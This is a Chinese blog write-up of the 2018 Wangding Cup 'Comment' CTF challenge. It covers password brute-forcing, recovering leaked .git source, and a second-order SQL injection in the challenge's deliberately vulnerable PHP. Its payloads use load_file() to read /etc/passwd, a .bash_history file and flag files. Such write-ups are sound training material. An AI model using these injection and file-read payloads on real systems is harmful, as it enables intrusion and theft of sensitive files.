[网鼎杯 2018]Comment

已于 2022-06-17 21:20:46 修改
阅读量162 收藏
点赞数
分类专栏: CTF 文章标签: php sql
于 2022-06-17 21:14:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21300173/article/details/125339966
版权

文章目录

[网鼎杯 2018]Comment

爆破一下密码,为zhangwei666,登录即可发帖
F12在控制台处看到提示
在这里插入图片描述
发现是源码泄露,然后用王一航大佬的 githacker 来下载源码,下载完以后,发现源码不全,进行恢复;

看一下git的操作记录

git log --reflog

commit e5b2a2443c2b6d395d06960123142bc91123148c (refs/stash)
Merge: bfbdf21 5556e3a
Author: root <root@localhost.localdomain>
Date:   Sat Aug 11 22:51:17 2018 +0800

    WIP on master: bfbdf21 add write_do.php

commit 5556e3ad3f21a0cf5938e26985a04ce3aa73faaf
Author: root <root@localhost.localdomain>
Date:   Sat Aug 11 22:51:17 2018 +0800

    index on master: bfbdf21 add write_do.php

commit bfbdf218902476c5c6164beedd8d2fcf593ea23b (HEAD -> master)
Author: root <root@localhost.localdomain>
Date:   Sat Aug 11 22:47:29 2018 +0800

    add write_do.php

扫描到后台有.git文件泄露,但是下载下来的源码不齐全

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

恢复一下

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

得到完整源码

//write_do.php
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

在write部分使用addslashes()函数进行了过滤

$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);

但是在comment部分对从数据库中取出的category没有过滤,这就造成了二次注入

$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);

这里的二次注入表现为,addslashes过滤后产生的\不会进入数据库,即’1过滤后变成’1,进入库中却仍为’1,我们在取出数据后进行二次拼接,即可造成注入

在发帖处构造category为

', content=user(),/*

在留言处输入的content为

*/#

以下评论参考这里,不再重复。
最后的表现形式为

$sql = "insert into comment
            set category = '', content=user(),/*  
                content = '*/#',
                bo_id = '$bo_id'";

相当于我们构造了新的content,原来的content被我们用多行注释符/**/注释掉了
在这里插入图片描述
看到用户为root,如此高的权限,可以尝试使用load_file()读取文件

', content=load_file('/etc/passwd'),/*

在这里插入图片描述
读取一下历史操作

', content=load_file('/home/www/.bash_history'),/*

在这里插入图片描述
注意到虽然/var/www/html目录下的.DS_Store文件被删除了,但是/tmp/html目录下的.DS_Store文件还在,读一下

', content=hex(load_file('/tmp/html/.DS_Store')),/*

获取到的十六进制数据使用winhex打开,看到有flag_8946e1ff1ee3e40f.php,读一下。注意flag在页面源代码中,按F12查看

', content=load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'),/*

得到

3C3F7068700A0924666C61673D22666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D223B0A3F3E

Hex ASCII解码

flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}

假的flag
换一个目录读/var/www/html/

', content=(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*

得到

3C3F7068700A0924666C61673D22666C61677B65306333323365382D333465342D343562392D396534662D6363383137656633633134357D223B0A3F3E0A

Hex解码获取到真实的flag

flag{0f843a71-795a-4235-9280-4c9acfbfc6b2}

总结

简单总结以下,有问题欢迎提问交流。
参考文章如下:
https://blog.csdn.net/qq_41628669/article/details/106133104
https://blog.csdn.net/weixin_43940853/article/details/105121265

Grace东
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 533
【代码】[杯 2018]Comment题解,超详细!思路加payload
[杯 2018]Comment 注入读取文件load_file
qq_54929891的博客
04-01 1485
记录一下做这道题的经历和思路 发帖的时候要进行账号登陆,里面暗示了账号以及部分密码,后面的三个***我们采用爆破来进行
oracle comment命令用法示例分享
09-10
Oracle的`COMMENT ON`命令是数据库管理系统中用于添加元数据注释的重要工具,它允许数据库管理员或开发人员为表、列、操作符、索引类型、物化视图等对象添加描述性注释。这些注释有助于提高数据库的可读性和可维护性...
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器关...
powerdesigner,将name自动填充到注释(comment)。
08-10
在数据库建模过程中,为表、字段等对象添加注释(Comment)是十分重要的,因为它有助于增强代码的可读性和维护性。在PowerDesigner中,可以通过执行脚本来自动化一些重复性任务,例如将字段的名称(Name)自动填充到...
PowerDesigner 中name和comment 互换脚本
06-12
提供的两个脚本文件——"comment脚本赋值到PDM的name.vbs"和"name脚本赋值到PDM的comment.vbs",其功能分别是将当前对象的comment属性值赋给name,以及将name属性值赋给comment。这样的操作对于批量处理大量对象的...
mysqldocdump-comment-import-markdown
01-16
linux环境运行根据mysql的comment属性导出markdown格式的数据文档 ./mysqldocdump -u user -p xxxx -h 127.0.0.1 -D dbname -o db.md ./mysqldocdump -h markdown查看工具 推荐Typora
CTF_comment_git库泄露&&二次注入_wp
shelter1234567的博客
05-20 473
git是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。攻击者可以利用该漏洞下载git文件夹里的所有内容,如果文件内有敏感信息比如站点源码、数据库账户密码等,攻击者可能通过收集到信息攻击该服务器........
ctf-wp-comment
dahege666的博客
12-18 543
Comment是代表去添加一些评论或者注释 描述中说“程序员GIT写一半跑路了,没来得及Commit”,这是很明显的一个提示 git stash恢复: 最常用的就是使用git clone把github上的源码下载下来,在实际上当你把代码提交给github时是分为两个步骤的:一个git add,另一个是git commit。 在git工具里存在一个缓存区stage,当在工作区写完代码后,首先是使用git add,就是把修改后的代码放到了stage缓存区,但是修改之前的代码也是可以找打...
[杯 2018]Comment -----不会编程的崽
最新发布
不会编程的崽的博客
03-25 1071
杯 二次注入 Git泄露 弱口令
BUUCTF之[杯 2018]Comment
m0_62107966的博客
09-15 919
BUUCTF之[杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
[杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3102
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
Comment 解题记录
weixin_44732566的博客
04-01 1802
comment 2020年杯马上开始了,来做一下历年真题 打开题目 点击发帖-提交,跳转到一个登录界面,不过已经提升了用户名和密码 爆破后面三位,登录成功 登录进去就可以发帖了,但也不有想法,注入点试了不行,用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用gi...
2018杯re--beijing writeup
沐沐的博客
08-22 2766
昨天一上午一直在做这道逆向题,这个题目运行起来输出是乱码,就很烦气,一直在搞这个终端的编码问题,搞了半天结果方向错了,然后就放弃了,其实这道题做出来的人还是很多的,还是自己太菜了,感觉自己的re和pwn还是要多加努力学习才行,今天看到writeup来学习下,做一下学习的笔记哈。 拿到这个binary,用file命令看一下,这个binary的基本信息,这是一个32位的elf文件,放到ubuntu下...
[杯 2018]Fakebook
yao_xin_de_yuan的博客
09-01 972
Fakebook 先正常注册了一个用户名、密码和年龄都是123的用户,发现在注册的时候blog必须要一个址才行,很明显后台做了过滤。登陆。 点击123,发现url很经典。 测试了一下,发现是个很简单的sql联合查询注入。这个过滤很神奇可能只是为了走个流程,过滤了union select。对!你没有看错,就是过滤了这两个单词加空格连在一起的字符串。所以我们用union/**/select就可以绕过了。 注入payload为: 0 union/**/select 1,database(),3,4%20fr
sql COMMENT
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值